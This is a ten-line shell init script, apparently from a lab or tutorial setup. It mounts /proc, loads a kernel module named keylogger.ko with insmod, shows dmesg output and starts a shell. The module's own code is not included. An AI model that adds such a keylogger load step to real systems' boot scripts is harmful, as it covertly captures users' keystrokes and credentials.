1 2 3 4 5 6 7 8 9 10
#!/bin/sh # mount the proc file system mkdir /proc mount -t proc proc /proc insmod /usr/bin/keylogger.ko dmesg exec /bin/sh